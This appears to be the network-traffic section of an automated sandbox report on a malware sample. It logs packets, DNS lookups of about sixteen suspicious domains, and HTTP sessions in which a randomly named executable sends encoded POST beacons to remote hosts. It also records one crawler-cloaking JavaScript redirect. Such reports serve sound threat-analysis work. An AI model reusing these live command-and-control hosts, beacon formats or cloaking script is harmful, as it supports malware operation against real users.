                                                                Sep 22, 2024 17:44:50.204298019 CEST8049787172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:44:50.204591990 CEST8049787172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:44:50.204670906 CEST4978780192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:44:50.207087994 CEST4978780192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:44:50.211934090 CEST8049787172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:44:55.223121881 CEST4978880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:55.227982044 CEST804978881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:55.228075981 CEST4978880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:55.243880033 CEST4978880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:55.249598980 CEST804978881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:55.907061100 CEST804978881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:55.909316063 CEST804978881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:55.909400940 CEST4978880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:56.750550032 CEST4978880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:57.769175053 CEST4978980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:57.779541016 CEST804978981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:57.779702902 CEST4978980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:57.789427042 CEST4978980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:57.799787998 CEST804978981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:58.484381914 CEST804978981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:58.486882925 CEST804978981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:58.489909887 CEST4978980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:59.297373056 CEST4978980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:00.318085909 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:00.323455095 CEST804979081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:00.326219082 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:00.338097095 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:00.343343973 CEST804979081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:00.343404055 CEST804979081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:01.051942110 CEST804979081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:01.094305038 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:01.155039072 CEST804979081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:01.155167103 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:01.845096111 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:02.862884045 CEST4979180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:02.868096113 CEST804979181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:02.868213892 CEST4979180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:02.875157118 CEST4979180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:02.880039930 CEST804979181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:03.595550060 CEST804979181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:03.595602989 CEST804979181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:03.595757961 CEST4979180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:03.598330021 CEST4979180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:03.605232954 CEST804979181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:08.612783909 CEST4979280192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:08.618849039 CEST804979285.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:45:08.618952036 CEST4979280192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:08.628439903 CEST4979280192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:08.634267092 CEST804979285.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:45:10.141194105 CEST4979280192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:10.148758888 CEST804979285.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:45:10.148834944 CEST4979280192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:11.159308910 CEST4979380192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:11.164545059 CEST804979385.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:45:11.164689064 CEST4979380192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:11.173235893 CEST4979380192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:11.178241968 CEST804979385.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:45:12.688087940 CEST4979380192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:12.693356991 CEST804979385.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:45:12.693463087 CEST4979380192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:13.706892967 CEST4979480192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:13.712382078 CEST804979485.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:45:13.712481022 CEST4979480192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:13.722671032 CEST4979480192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:13.728014946 CEST804979485.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:45:13.728030920 CEST804979485.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:45:15.235183001 CEST4979480192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:15.240304947 CEST804979485.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:45:15.242243052 CEST4979480192.168.2.685.159.66.93

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Sep 22, 2024 17:41:04.046338081 CEST6434553192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:41:04.080699921 CEST53643451.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:41:19.770874977 CEST6269153192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:41:19.907835007 CEST53626911.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:41:33.300765038 CEST5346353192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:41:33.415821075 CEST53534631.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:41:46.866096020 CEST5919953192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:41:46.880342960 CEST53591991.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:42:00.535254002 CEST6500353192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:42:00.550533056 CEST53650031.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:42:13.850367069 CEST5249553192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:42:14.208965063 CEST53524951.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:42:27.473901987 CEST6447953192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:42:27.997874975 CEST53644791.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:42:42.144592047 CEST4995353192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:42:42.168911934 CEST53499531.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:42:55.677086115 CEST6210453192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:42:55.695858955 CEST53621041.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:43:08.832360983 CEST6205753192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:43:08.892488003 CEST53620571.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:43:22.144737959 CEST6090253192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:43:22.598562002 CEST53609021.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:43:35.973227024 CEST5649753192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:43:35.989449024 CEST53564971.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:43:49.539314032 CEST4932053192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:43:49.715936899 CEST53493201.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:44:03.394731998 CEST6431553192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:44:03.432013988 CEST53643151.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:44:18.097624063 CEST5463153192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:44:18.151195049 CEST53546311.1.1.1192.168.2.6
                                                                Sep 22, 2024 17:44:31.473134995 CEST6339053192.168.2.61.1.1.1
                                                                Sep 22, 2024 17:44:31.523127079 CEST53633901.1.1.1192.168.2.6

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Sep 22, 2024 17:41:04.046338081 CEST192.168.2.61.1.1.10x465Standard query (0)www.moritynomxd.xyzA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:41:19.770874977 CEST192.168.2.61.1.1.10xee04Standard query (0)www.kovallo.cloudA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:41:33.300765038 CEST192.168.2.61.1.1.10xdaecStandard query (0)www.sppsuperplast.onlineA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:41:46.866096020 CEST192.168.2.61.1.1.10x9917Standard query (0)www.tracy.clubA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:00.535254002 CEST192.168.2.61.1.1.10xd5a7Standard query (0)www.sterkus.xyzA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:13.850367069 CEST192.168.2.61.1.1.10x34e1Standard query (0)www.syncnodex.netA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:27.473901987 CEST192.168.2.61.1.1.10xc127Standard query (0)www.galaxyslot88rtp.latA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:42.144592047 CEST192.168.2.61.1.1.10xcfa8Standard query (0)www.warriorsyndrome.netA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:55.677086115 CEST192.168.2.61.1.1.10xf586Standard query (0)www.ks1x7i.vipA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:43:08.832360983 CEST192.168.2.61.1.1.10x8702Standard query (0)www.pakmartcentral.shopA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:43:22.144737959 CEST192.168.2.61.1.1.10x1bcaStandard query (0)www.les-massage.onlineA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:43:35.973227024 CEST192.168.2.61.1.1.10x1aaaStandard query (0)www.rtpngk.xyzA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:43:49.539314032 CEST192.168.2.61.1.1.10xe978Standard query (0)www.wcq24.topA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:44:03.394731998 CEST192.168.2.61.1.1.10xd358Standard query (0)www.cc101.proA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:44:18.097624063 CEST192.168.2.61.1.1.10xc9fbStandard query (0)www.asociacia.onlineA (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:44:31.473134995 CEST192.168.2.61.1.1.10xceddStandard query (0)www.deefbank.netA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Sep 22, 2024 17:41:04.080699921 CEST1.1.1.1192.168.2.60x465No error (0)www.moritynomxd.xyz172.81.61.224A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:41:19.907835007 CEST1.1.1.1192.168.2.60xee04No error (0)www.kovallo.cloudkovallo.cloudCNAME (Canonical name)IN (0x0001)false
                                                                Sep 22, 2024 17:41:19.907835007 CEST1.1.1.1192.168.2.60xee04No error (0)kovallo.cloud81.2.196.19A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:41:33.415821075 CEST1.1.1.1192.168.2.60xdaecNo error (0)www.sppsuperplast.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                Sep 22, 2024 17:41:33.415821075 CEST1.1.1.1192.168.2.60xdaecNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                Sep 22, 2024 17:41:33.415821075 CEST1.1.1.1192.168.2.60xdaecNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:41:46.880342960 CEST1.1.1.1192.168.2.60x9917No error (0)www.tracy.clubtracy.clubCNAME (Canonical name)IN (0x0001)false
                                                                Sep 22, 2024 17:41:46.880342960 CEST1.1.1.1192.168.2.60x9917No error (0)tracy.club3.33.130.190A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:41:46.880342960 CEST1.1.1.1192.168.2.60x9917No error (0)tracy.club15.197.148.33A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:00.550533056 CEST1.1.1.1192.168.2.60xd5a7No error (0)www.sterkus.xyz209.74.95.29A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:14.208965063 CEST1.1.1.1192.168.2.60x34e1No error (0)www.syncnodex.net15.197.172.60A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:27.997874975 CEST1.1.1.1192.168.2.60xc127No error (0)www.galaxyslot88rtp.latgalaxyslot88rtp.latCNAME (Canonical name)IN (0x0001)false
                                                                Sep 22, 2024 17:42:27.997874975 CEST1.1.1.1192.168.2.60xc127No error (0)galaxyslot88rtp.lat46.17.172.49A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:42.168911934 CEST1.1.1.1192.168.2.60xcfa8No error (0)www.warriorsyndrome.netwarriorsyndrome.netCNAME (Canonical name)IN (0x0001)false
                                                                Sep 22, 2024 17:42:42.168911934 CEST1.1.1.1192.168.2.60xcfa8No error (0)warriorsyndrome.net3.33.130.190A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:42.168911934 CEST1.1.1.1192.168.2.60xcfa8No error (0)warriorsyndrome.net15.197.148.33A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:55.695858955 CEST1.1.1.1192.168.2.60xf586No error (0)www.ks1x7i.vipks1x7i.vipCNAME (Canonical name)IN (0x0001)false
                                                                Sep 22, 2024 17:42:55.695858955 CEST1.1.1.1192.168.2.60xf586No error (0)ks1x7i.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:42:55.695858955 CEST1.1.1.1192.168.2.60xf586No error (0)ks1x7i.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:43:08.892488003 CEST1.1.1.1192.168.2.60x8702No error (0)www.pakmartcentral.shoppakmartcentral.shopCNAME (Canonical name)IN (0x0001)false
                                                                Sep 22, 2024 17:43:08.892488003 CEST1.1.1.1192.168.2.60x8702No error (0)pakmartcentral.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:43:22.598562002 CEST1.1.1.1192.168.2.60x1bcaNo error (0)www.les-massage.online194.58.112.174A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:43:35.989449024 CEST1.1.1.1192.168.2.60x1aaaNo error (0)www.rtpngk.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:43:35.989449024 CEST1.1.1.1192.168.2.60x1aaaNo error (0)www.rtpngk.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:43:49.715936899 CEST1.1.1.1192.168.2.60xe978No error (0)www.wcq24.topwcq24.topCNAME (Canonical name)IN (0x0001)false
                                                                Sep 22, 2024 17:43:49.715936899 CEST1.1.1.1192.168.2.60xe978No error (0)wcq24.top154.23.184.240A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:44:03.432013988 CEST1.1.1.1192.168.2.60xd358No error (0)www.cc101.pro188.114.97.3A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:44:03.432013988 CEST1.1.1.1192.168.2.60xd358No error (0)www.cc101.pro188.114.96.3A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:44:18.151195049 CEST1.1.1.1192.168.2.60xc9fbNo error (0)www.asociacia.onlineasociacia.onlineCNAME (Canonical name)IN (0x0001)false
                                                                Sep 22, 2024 17:44:18.151195049 CEST1.1.1.1192.168.2.60xc9fbNo error (0)asociacia.online81.2.196.19A (IP address)IN (0x0001)false
                                                                Sep 22, 2024 17:44:31.523127079 CEST1.1.1.1192.168.2.60xceddNo error (0)www.deefbank.netghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                Sep 22, 2024 17:44:31.523127079 CEST1.1.1.1192.168.2.60xceddNo error (0)ghs.googlehosted.com142.250.185.115A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • www.moritynomxd.xyz
                                                                • www.kovallo.cloud
                                                                • www.sppsuperplast.online
                                                                • www.tracy.club
                                                                • www.sterkus.xyz
                                                                • www.syncnodex.net
                                                                • www.galaxyslot88rtp.lat
                                                                • www.warriorsyndrome.net
                                                                • www.ks1x7i.vip
                                                                • www.pakmartcentral.shop
                                                                • www.les-massage.online
                                                                • www.rtpngk.xyz
                                                                • www.wcq24.top
                                                                • www.cc101.pro
                                                                • www.asociacia.online
                                                                • www.deefbank.net

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.649718172.81.61.224804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:04.101147890 CEST423OUTGET /v5tr/?azq=fdKL&i4fTbV=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1nDXQn1hUK94ec9ohCtOvtuL7AUDvHPFr4eFDSQ4dByebKLhAxCA= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.moritynomxd.xyz
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:41:04.719127893 CEST728INHTTP/1.1 200 OK
                                                                Content-Type: text/html; charset=utf-8
                                                                X-Address: gin_throttle_mw_7200000000_8.46.123.33
                                                                X-Ratelimit-Limit: 500
                                                                X-Ratelimit-Remaining: 499
                                                                X-Ratelimit-Reset: 1727023264
                                                                Date: Sun, 22 Sep 2024 15:41:04 GMT
                                                                Content-Length: 458
                                                                Connection: close
                                                                Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                                                Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.64972081.2.196.19804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:19.964936018 CEST686OUTPOST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 39 65 34 37 6a 47 43 55 6f 31 68 65 35 7a 33 65 47 6f 30 79 6a 56 42 77 38 63 64 74 33 71 4c 7a 62 2f 63 7a 66 6e 72 38 70 44 7a 73 70 67 61 57 5a 51 4d 45 30 4d 77 71 68 62 30 4d 45 6a 64 66 43 41 30 5a 6c 33 70 47 65 6a 6f 50 43 5a 48 79 5a 56 4e 33 47 64 67 7a 34 57 73 4d 43 72 65 6e 2b 35 43 76 42 58 31 75 6f 68 52 56 5a 76 4b 70 4a 50 2f 49 2f 52 6a 55 74 72 76 79 70 78 4e 4b 79 46 69 7a 41 4f 52 62 69 39 64 63 6f 58 68 4b 63 6a 61 49 42 45 6f 34 53 50 70 4f 44 4b 58 68 45 6e 68 4d 78 35 74 68 43 61 63 51 37 6e 2f 73 6a 44 55 30 2b 31 54 73 71 5a 51 73 35 71 6f 55
                                                                Data Ascii: i4fTbV=dsMqkxxmQj+V9e47jGCUo1he5z3eGo0yjVBw8cdt3qLzb/czfnr8pDzspgaWZQME0Mwqhb0MEjdfCA0Zl3pGejoPCZHyZVN3Gdgz4WsMCren+5CvBX1uohRVZvKpJP/I/RjUtrvypxNKyFizAORbi9dcoXhKcjaIBEo4SPpODKXhEnhMx5thCacQ7n/sjDU0+1TsqZQs5qoU
                                                                Sep 22, 2024 17:41:20.781038046 CEST355INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:41:20 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.64972181.2.196.19804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:22.527823925 CEST710OUTPOST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 38 39 67 37 68 68 57 55 70 56 68 64 32 54 33 65 4d 49 30 32 6a 56 4e 77 38 5a 39 39 33 5a 2f 7a 56 37 59 7a 4f 57 72 38 6b 6a 7a 73 6e 41 62 63 64 51 4d 50 30 4d 38 49 68 61 49 4d 45 6a 35 66 43 46 59 5a 6c 67 39 46 65 7a 6f 42 58 4a 48 6a 47 46 4e 33 47 64 67 7a 34 57 34 6d 43 72 32 6e 2b 4a 53 76 54 47 31 76 33 52 52 53 50 2f 4b 70 44 76 2f 45 2f 52 6a 79 74 71 7a 49 70 79 31 4b 79 42 6d 7a 44 63 31 55 6f 39 64 65 6b 48 67 71 55 7a 50 4d 59 58 56 2b 52 2b 73 73 53 34 54 53 49 78 67 57 74 4b 74 43 51 4b 38 53 37 6c 6e 65 6a 6a 55 65 38 31 72 73 34 4f 63 4c 32 65 4e 33 33 51 61 5a 66 31 58 39 74 54 49 35 71 67 6b 52 64 5a 48 7a 62 51 3d 3d
                                                                Data Ascii: i4fTbV=dsMqkxxmQj+V89g7hhWUpVhd2T3eMI02jVNw8Z993Z/zV7YzOWr8kjzsnAbcdQMP0M8IhaIMEj5fCFYZlg9FezoBXJHjGFN3Gdgz4W4mCr2n+JSvTG1v3RRSP/KpDv/E/RjytqzIpy1KyBmzDc1Uo9dekHgqUzPMYXV+R+ssS4TSIxgWtKtCQK8S7lnejjUe81rs4OcL2eN33QaZf1X9tTI5qgkRdZHzbQ==
                                                                Sep 22, 2024 17:41:23.331474066 CEST355INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:41:23 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.64972281.2.196.19804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:25.065902948 CEST1723OUTPOST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
